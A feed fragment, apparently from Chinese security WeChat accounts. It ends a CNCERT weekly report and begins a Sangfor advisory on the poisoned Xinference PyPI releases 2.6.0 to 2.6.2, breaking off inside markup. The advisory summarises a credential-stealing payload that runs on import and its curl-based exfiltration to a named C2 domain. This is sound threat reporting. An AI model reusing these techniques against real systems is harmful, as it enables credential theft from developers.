leaf="">本周，CNCERT协调云服务商、域名注册服务机构、应用商店、各省分中心以及国际合作组织共处理网络安全事件254起，含跨境网络安全事件86起。其中，协调境内外域名注册机构、境外CERT等机构重点处理158起仿冒投诉事件。协调7个提供恶意移动应用程序下载服务的平台开展移动互联网恶意代码处理工作，共处理传播移动互联网恶意代码的恶意URL链接7个。</span></p></span></p><div style="margin-bottom: 0px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.48px;"><div style="outline: 0px;text-align: center;"><div style="padding-right: 8px;padding-left: 8px;outline: 0px;height: 40px;color: rgb(255, 255, 255);line-height: 40px;font-size: 16px;display: inline-block;background-color: rgb(79, 129, 189);"><p style="outline: 0px;"><span style="outline: 0px;font-size: 14px;"><span leaf="">近期回顾</span></span></p></div></div></div><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501491&amp;idx=1&amp;sn=a6e040484ce7882bf47d50987410bfe4&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第16期（4月13日-4月19日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第16期（4月13日-4月19日）</a></span></span></span></span></span></span></span></span></span></p><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;letter-spacing: 0.54px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501447&amp;idx=1&amp;sn=0f80ca1d770f552e908dbf28df485e07&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第15期（4月6日-4月12日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第15期（4月6日-4月12日）</a></span></span></span></span></span></span></span></span></span></p><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;letter-spacing: 0.54px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501406&amp;idx=1&amp;sn=f2e30d65d7bacb2eae51bde67d6b1ed8&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第14期（3月30日-4月5日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第14期（3月30日-4月5日）</a></span></span></span></span></span></span></span></span></span></p><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;letter-spacing: 0.54px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501384&amp;idx=1&amp;sn=8ab76f1f0a1e754606422e898e1612d5&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第13期（3月23日-3月29日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第13期（3月23日-3月29日）</a></span></span></span></span></span></span></span></span></span></p><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;letter-spacing: 0.54px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501366&amp;idx=1&amp;sn=b260af0c80744f40044ba99b0d841792&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第12期（3月16日-3月22日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第12期（3月16日-3月22日）</a></span></span></span></span></span></span></span></span></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=027733a0&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525429%26idx%3D3%26sn%3D81c972bbb2dae75573479374efa28eb1">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 29 Apr 2026 20:25:00 +0800</pubDate>
    </item>
    <item>
      <title>【恶意文件通告】Xinference供应链投毒</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525409&amp;idx=1&amp;sn=0a13bb93d699cc80e341b74d5d9e6f6b</link>
      <description>近期，深信服千里目安全技术中心监测到一起围绕Xinference开源推理框架的PyPI供应链投毒事件。</description>
      <content:encoded><![CDATA[<p><span>深瞻情报实验室</span> <span>2026-04-24 20:29</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=99ddfc1c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FAPc6NwjLsxRZLTgjnLCPkJMRDNqE0ichVtsY0wpvFmD7MRZe73Q233Tc9yTGTdZ4iaV8opYTPqedSSesDDAENIniakNvpZOwSf8kicdxQSyy3lA%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16635687732342008" data-s="300,640" data-type="gif" data-w="1076" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041727" src="https://wechat2rss.xlab.app/img-proxy/?k=f735986c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxSB3CQK3w29POH9Ggq7XQ1m82bAGmpYAYTq77KH1gQz7B3n0C8uO7lOrKnrbGReORRO8Gx87W3up4oYWSPyWiaVshJpo24qW2Wk%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">近期，深信服千里目安全技术中心监测到一起围绕Xinference开源推理框架的PyPI供应链投毒事件。根据xorbitsai/inference项目维护者于2026年4月22日在GitHub公开确认的信息，xinference的2.6.0、2.6.1、2.6.2版本已遭攻击者注入恶意代码并被紧急撤回，攻击起点并非仿冒包名，而是合法PyPI发布线被劫持，属于典型的合法软件供应链投毒事件。</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意文件概要</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><table><tbody><tr><td data-colwidth="264" width="264" valign="center"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><b><font face="仿宋_GB2312"><span leaf="">事件名称</span></font></b></p></td><td data-colwidth="562" width="562" valign="center"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><font face="仿宋_GB2312"><span leaf="">关于</span></font><font face="Times New Roman"><span leaf="">Xinference PyPI</span></font><font face="仿宋_GB2312"><span leaf="">包的供应链投毒攻击</span></font></p></td></tr><tr><td data-colwidth="264" width="264" valign="center"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><b><font face="仿宋_GB2312"><span leaf="">发布时间</span></font></b></p></td><td data-colwidth="562" width="562" valign="center"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><font face="Times New Roman"><span leaf="">2026</span></font><font face="仿宋_GB2312"><span leaf="">年</span></font><font face="Times New Roman"><span leaf="">4</span></font><font face="仿宋_GB2312"><span leaf="">月</span></font><font face="Times New Roman"><span leaf="">24</span></font><font face="仿宋_GB2312"><span leaf="">日</span></font></p></td></tr><tr><td data-colwidth="264" width="264" valign="center"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><b><font face="仿宋_GB2312"><span leaf="">威胁类型</span></font></b></p></td><td data-colwidth="562" width="562" valign="center"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><font face="Times New Roman"><span leaf="">PyPI</span></font><font face="仿宋_GB2312"><span leaf="">发布线劫持、合法包投毒、凭据窃取、</span></font><font face="Times New Roman"><span leaf="">AI</span></font><font face="仿宋_GB2312"><span leaf="">推理基础设施攻击</span></font></p></td></tr><tr><td data-colwidth="264" width="264" valign="center"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><b><font face="仿宋_GB2312"><span leaf="">简单描述</span></font></b></p></td><td data-colwidth="562" width="562" valign="center"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><font face="仿宋_GB2312"><span leaf="">攻击者通过盗用的维护者</span></font><font face="Times New Roman"><span leaf="">/</span></font><font face="仿宋_GB2312"><span leaf="">发布凭据向</span></font><font face="Times New Roman"><span leaf="">PyPI</span></font><font face="仿宋_GB2312"><span leaf="">正式发布线推送</span></font><font face="Times New Roman"><span leaf="">xinference 2.6.0</span></font><font face="仿宋_GB2312"><span leaf="">、</span></font><font face="Times New Roman"><span leaf="">2.6.1</span></font><font face="仿宋_GB2312"><span leaf="">、</span></font><font face="Times New Roman"><span leaf="">2.6.2</span></font><font face="仿宋_GB2312"><span leaf="">三个恶意版本，在</span></font><font face="Times New Roman"><span leaf="">xinference/__init__.py</span></font><font face="仿宋_GB2312"><span leaf="">中嵌入双层</span></font><font face="Times New Roman"><span leaf="">Base64</span></font><font face="仿宋_GB2312" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);white-space: normal;box-sizing: border-box;"><span leaf="">混淆载荷，在</span></font><font face="Times New Roman"><span leaf="">import</span></font><font face="仿宋_GB2312"><span leaf="">或</span></font><font face="Times New Roman"><span leaf="">CLI/</span></font><font face="仿宋_GB2312"><span leaf="">服务启动时后台派生子进程实施凭据窃取并外传至</span></font><font face="Times New Roman"><span leaf="">C2</span></font><font face="仿宋_GB2312"><span leaf="">。</span></font></p></td></tr><tr><td data-colwidth="264" width="264" valign="center"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><b><font face="仿宋_GB2312"><span leaf="">关键特征</span></font></b></p></td><td data-colwidth="562" width="562" valign="center"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><font face="仿宋_GB2312"><span leaf="">合法发布线被劫持；恶意代码位于</span></font><font face="Times New Roman"><span leaf="">__init__.py</span></font><font face="仿宋_GB2312"><span leaf="">导入即触发；双层</span></font><font face="Times New Roman"><span leaf="">Base64 + subprocess.Popen</span></font><font face="仿宋_GB2312"><span leaf="">分离执行；重点收集</span></font><font face="Times New Roman"><span leaf="">SSH</span></font><font face="仿宋_GB2312"><span leaf="">、云</span></font><font face="Times New Roman"><span leaf="">IAM</span></font><font face="仿宋_GB2312"><span leaf="">、</span></font><font face="Times New Roman"><span leaf="">K8s</span></font><font face="仿宋_GB2312"><span leaf="">、</span></font><font face="Times New Roman"><span leaf="">Docker</span></font><font face="仿宋_GB2312"><span leaf="">、包管理器令牌、</span></font><font face="Times New Roman"><span leaf="">.env</span></font><font face="仿宋_GB2312"><span leaf="">、数据库、</span></font><font face="Times New Roman"><span leaf="">TLS</span></font><font face="仿宋_GB2312"><span leaf="">和加密钱包等凭据；打包为</span></font><font face="Times New Roman"><span leaf="">love.tar.gz</span></font><font face="仿宋_GB2312"><span leaf="">经带自定义头</span></font><font face="Times New Roman"><span leaf="">X-QT-SR: 14</span></font><font face="仿宋_GB2312"><span leaf="">的</span></font><font face="Times New Roman"><span leaf="">curl --data-binary</span></font><font face="仿宋_GB2312"><span leaf="">外传至</span></font><font face="Times New Roman"><span leaf="">whereisitat.lucyatemysuperbox.space</span></font><font face="仿宋_GB2312"><span leaf="">；样本含</span></font><font face="Times New Roman"><span leaf=""># hacked by teampcp</span></font><font face="仿宋_GB2312"><span leaf="">标记，</span></font><font face="Times New Roman"><span leaf="">TeamPCP</span></font><font face="仿宋_GB2312"><span leaf="">已公开否认负责。</span></font></p></td></tr></tbody></table></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">事件详述</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: 